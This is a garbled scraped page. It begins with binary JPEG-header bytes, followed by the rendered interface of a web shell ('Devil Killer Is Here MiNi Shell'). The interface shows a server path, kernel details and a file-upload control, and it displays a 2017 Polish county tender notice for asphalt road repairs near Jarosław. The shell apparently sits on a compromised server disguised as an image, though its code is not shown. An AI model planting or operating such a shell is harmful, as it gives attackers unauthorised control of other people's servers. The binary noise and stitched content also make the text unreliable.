JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170210/23641-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.pzd.jaroslaw.pl' target='_blank'>http://www.pzd.jaroslaw.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 23641 - 2017
              z dnia 2017-02-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jarosław: Wykonanie remontów cząstkowych   nawierzchni bitumicznych   na drogach  powiatowych administrowanych przez Powiatowy Zarząd Dróg w Jarosławiu z podziałem na  6 części  <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Zarząd Dróg w Jarosławiu, krajowy numer identyfikacyjny
              , ul.
              ul. Jana Pawła II 
              17,
              37500  
              Jarosław, woj.
              podkarpackie, państwo
              Polska, tel.
              , e-mail
              zdjaroslaw@poczta.onet.pl, faks
              .
              <br />
              Adres strony internetowej (URL): www.pzd.jaroslaw.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.pzd.jaroslaw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zgodnie z art. lOc ust. 2 ustawy Prawo zamówień publicznych w związku z art. 18 ustawy z dnia 22 czerwca 2016r. o zmianie ustawy - Prawo zamówień publicznych oraz niektórych innych ustaw (Dz. U z 2016r. poz. 1020) składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r. - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015r. poz. 1830), osobiście lub za pośrednictwem posłańca lub kuriera.<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie remontów cząstkowych   nawierzchni bitumicznych   na drogach  powiatowych administrowanych przez Powiatowy Zarząd Dróg w Jarosławiu z podziałem na  6 części  <br /><b>Numer referencyjny: </b>ZP.271.1.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia  jest  wykonanie remontów cząstkowych  nawierzchni bitumicznych   na drogach  powiatowych  administrowanych przez Powiatowy Zarząd Dróg w Jarosławiu  z podziałem na zadania:
Zadanie Nr1- miasto Jarosław i Radymno
Zadanie Nr2  gmina Jarosław i Pawłosiów  
Zadanie Nr3   gmina Laszki i Wiązownica
Zadanie Nr4  gmina Rokietnica i Chłopice
Zadanie Nr5   gmina Pruchnik i Rożwienica 
Zadanie Nr 6- gmina Radymno
2. Szczegółowy zakres przedmiotowy  niniejszego zamówienia swoim zakresem (dla  zadań od 1 do 6) obejmuje wykonanie:
 1) Roboty remontowe- frezowanie nawierzchni bitumicznych o grub. do 5 cm z wywozem materiału z rozbiórki na    
   odl.   do 5km  wskazaną przez Inspektora Nadzoru,
 2) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków do 5 cm,
 3) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków powyżej 5 cm,
 4) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego bez obcinania krawędzi,
 5) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego z obcinaniem krawędzi,
 6) Wyrównanie istniejącej podbudowy tłuczniem kamiennym o grub. 5-10 cm po zagęszczeniu,
 7) Wyrównanie istniejącej nawierzchni betonem asfaltowym mechanicznie.
UWAGA:
 Wykonawca zobowiązany jest prowadzić remont cząstkowy nawierzchni w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. W ciągu dnia remontować można jezdnie jedynie poza godzinami szczytu, natomiast w punktach newralgicznych ( miastach) w godzinach szczytu wyłącznie za zezwoleniem Inspektora Nadzoru Zabrania się wykonywania remontów na głównych ciągach komunikacyjnych (w tym miasta) w piątki i dni przedświąteczne. Na drogach tych i w okresie zabronionym mogą być remontowane miejsca zagrażające bezpieczeństwu ruchu na wyraźne polecenie Inspektora Nadzoru.
Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca. 
 Wykonawca zobowiązany jest do oznakowania miejsca wykonania robót , zgodnie z ROZPORZĄDZENIEM MINISTRA INFRASTRUKTURY z dnia 3 lipca 2003r.w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach i utrzymywania tego oznakowania w należytym stanie przez cały czas wykonywania robót remontowych. 
3. Szczegółowy zakres robót  zawierają    kosztorysy  ofertowe  stanowiące załączniki do SIWZ  - Rozdział II Formularz Nr 2, 2.1,2.2, 2.3, 2.4 i 2.5 oraz  specyfikacje techniczne   wykonania i odbioru robót    zawarte  w  Rozdziale IV niniejszej Specyfikacji  Istotnych Warunków Zamówienia.   
 4. Zaleca się dokonania przez Wykonawców   wizji lokalnej   na terenie będącym przedmiotem niniejszego zamówienia ,  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty.
<br /><br /><b>II.5) Główny kod CPV: </b>45233242-6<br /><b> Dodatkowe kody CPV:</b>45233140-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                 Zamawiający przewiduje możliwości udzielenia wykonawcy zamówienia podstawowego zamówień o których mowa w art. 67. ust. 1pkt 6 ustawy Prawo zamówień publicznych w zakresie wszystkich części zamówienia. Zamówienia te obejmą roboty tożsame z przedmiotem zamówienia, jeżeli zamawiający pozyska oszczędności z których będzie mógł je sfinansować. Wartość udzielonych zamówień ( dla zadań od 1 do 6) łącznie nie przekroczy kwoty 200.000,00, PLN brutto.  <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Nie dotychy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Zamawiający uzna, iż wykonawca posiada zdolność techniczną lub zawodową jeżeli: 
   1)  wykaże bez względu na ilość wybranych przez siebie części zamówienia , że  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej 1 robotę budowlaną  polegającą na remoncie cząstkowym nawierzchni   bitumicznych   o wartościach minimum 50.000,00 zł brutto .
        W przypadku złożenia oferty na więcej niż jedną część zamówienia, Wykonawca winien wykazać 
        spełnianie w/w warunku dla każdej części oddzielnie.  
   2)  wykaże, że skierowane przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialne za kierowanie robotami budowlanymi osoby, legitymują się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji, jakie zostaną im powierzone oraz informacją o podstawie do dysponowania tymi osobami tj.  posiadania uprawnień budowlanych do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących  przepisów  oraz  posiadający co najmniej 3-letnie doświadczenie (licząc od dnia uzyskania uprawnień) w pracy na stanowisku kierownika budowy lub kierownika robót drogowych przy realizacji min. 1 roboty budowlanej polegającej na budowie ,   przebudowie lub remoncie  dróg   o    wartości  nie mniejszej niż  50.000,00 zł ( brutto).
       Zamawiający dopuszcza przedstawienie tej samej osoby do pełnienia obowiązków Kierownika  
       budowy/robót w różnych częściach zamówienia
   3) wykaże, że  dysponuje   w    celu   realizacji niniejszego   zamówienia odpowiednim   potencjałem technicznym, 
        dla każdej z części zamówienia.:
        a) specjalistyczny sprzęt do naprawy powierzchniowych uszkodzeń, spękań ( remonter), - 1szt
        b) samochód samowyładowczy min.  5t    1 szt.
        W przypadku gdy Wykonawca składa ofertę na więcej niż jedną część/zadanie, musi wykazać    
       spełnienie powyższego warunku   oddzielnie dla każdej części/zadania.
      Łącznie dla wszystkich części/zadań:
a) frezarka do nawierzchni bitumicznych- 1 szt,
        b) układarka do mas bitumicznych i zestaw walców (8t, 12t)  1 kpl.,
        c) walec ogumiony  1 szt.,
        d) piła do cięcia asfaltu  1 szt.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianie warunków w pkt III.1.3) ogłoszenia, Wykonawcy wykazują łącznie. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne 
       przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu,  
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.  W   celu   potwierdzenia   spełniania   przez   Wykonawcę   warunków   udziału w postępowaniu:
    1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których te roboty zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnych charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty   potwierdzających spełnienie warunku opisanego w Części 9 ust. 2 pkt.1
      Uwaga: W przypadku złożenia oferty na więcej niż jedną część zamówienia, Wykonawca winien złożyć 
       oddzielny wykaz dla każdej części
  2) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności 
              odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji    
              zawodowych, uprawnień i  doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu 
               wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami  
               potwierdzających spełnienie warunku opisanego w Części 9 ust. 2 pkt.2
  3) wykaz narzędzi i urządzeń dostępnych wykonawcy robót budowlanych w celu wykonania zamówienia wraz z 
      informacją o podstawie do dysponowania tymi zasobami , potwierdzających spełnienie warunku opisanego w 
      Części 9 ust. 2 pkt.3
      Uwaga: Wykonawca opisuje każdy sprzęt w taki sposób, aby można było go zidentyfikować na podstawie cech 
            szczególnych (tj. np. nr rejestracyjny, nr seryjny itp.) oddzielnie na każde zadanie, na które składa ofertę. 
      W przypadku złożenia oferty na więcej niż jedną część zamówienia, Wykonawca winien złożyć oddzielny  
       wykaz dla każdej części/zadania.
      W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców 
            składających ofertę wspólną. 
Wyżej wymienionych dokumentów nie należy dołączyć do oferty. Wykonawca, którego oferta zostanie uznana 
za najkorzystniejszą zostanie powiadomiony odrębnym pismem o terminie i miejscu ich dostarczenia.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">3. W terminie 3 dni od zamieszczenia na stronie internetowej zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 3 Pzp Wykonawca zobowiązany jest przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1
pkt 23 ustawy Pzp  zgodnie z Załącznikiem nr 5 do SIWZ
UWAGA: Informację Wykonawcy o przynależności do grupy kapitałowej składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 2.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach innych podmiotów musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
